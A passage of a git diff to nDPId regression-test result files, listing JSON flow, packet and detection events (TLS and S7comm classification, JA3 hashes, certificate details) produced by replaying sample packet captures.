+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1408528803884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803884,"pkt":"kOa6hF5BABsbI+s7CABFAAA+AM4AAB4GGGrAqAEowKgBCgBmEFkAAvsQkETduFAYEAAGowAAAwAAFhHQAAcAAwDAAQrBAgEAwgIBAg=="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1408528803884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1408528803884,"pkt":"ABsbI+s7kOa6hF5BCABFAABBLUxAAIAGAADAqAEKwKgBKBBZAGaQRN24AAL7JlAY+tqDtgAAAwAAGQLwgDIBAAACAAAIAADwAAABAAEB4A=="} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1408528803880,"flow_last_seen":1408528804016,"flow_idle_time":7560000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":2290,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1408528804016,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","packets-captured":55,"packets-processed":55,"total-skipped-flows":0,"total-l4-data-len":2290,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1408528804016} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 55/55 diff --git a/test/results/safari.pcap.out b/test/results/safari.pcap.out index 2d455a393..8115dcf76 100644 --- a/test/results/safari.pcap.out +++ b/test/results/safari.pcap.out @@ -1,56 +1,56 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"safari.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1620898024056} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898024056,"flow_last_seen":1620898024056,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898024056,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620898024056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898024056,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfeAbt7aT+8AAAAALAC\/\/8bGAAAAgQFtAEDAwUBAQgKMzDFWAAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620898024084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898024084,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7194MY\/Pce2k\/vaAS\/ohIgwAAAgQFrAQCCAo6VqpvMzDFWAEDAwc="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620898024085,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898024085,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfeAbt7aT+9DGPz3YAQECxliAAAAQEICjMwxXQ6Vqpv"} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898024056,"flow_last_seen":1620898024085,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898024085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfhAbvK+gqhAAAAALAC\/\/\/8IwAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfiAbtAr8myAAAAALAC\/\/\/HXAAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfjAbsjVMkKAAAAALAC\/\/\/lXgAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025217,"flow_last_seen":1620898025217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025217,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620898025217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025217,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfkAbuNFQaeAAAAALAC\/\/8+CAAAAgQFtAEDAwUBAQgKMzDJ1AAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025217,"flow_last_seen":1620898025217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025217,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620898025217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025217,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtflAbtmxM47AAAAALAC\/\/+cugAAAgQFtAEDAwUBAQgKMzDJ1AAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620898025246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025246,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+Mw2y0GI1TJC6AS\/oiwoAAAAgQFrAQCCAo6Vq73MzDJ0wEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620898025246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025246,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfjAbsjVMkLMNstB4AQECzNqAAAAQEICjMwyew6Vq73"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620898025246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025246,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+H+SkNFyvoKoqAS\/ojjtwAAAgQFrAQCCAo6Vq72MzDJ0wEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620898025246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025246,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfhAbvK+gqi\/kpDRoAQECwAwAAAAQEICjMwyew6Vq72"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620898025247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025247,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+RZmQEsjRUGn6AS\/ogMZAAAAgQFrAQCCAo6Vq75MzDJ1AEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfkAbuNFQafWZkBLYAQECwpbAAAAQEICjMwye06Vq75"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620898025247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025247,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+LVp22MQK\/Js6AS\/oitTAAAAgQFrAQCCAo6Vq72MzDJ0wEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfiAbtAr8mz1adtjYAQECzKUwAAAQEICjMwye06Vq72"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025248,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620898025251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025251,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+Xyf4O0ZsTOPKAS\/ohPpwAAAgQFrAQCCAo6Vq75MzDJ1AEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620898025251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025251,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtflAbtmxM488n+DtYAQECxsqwAAAQEICjMwyfE6Vq75"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025252,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025277,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 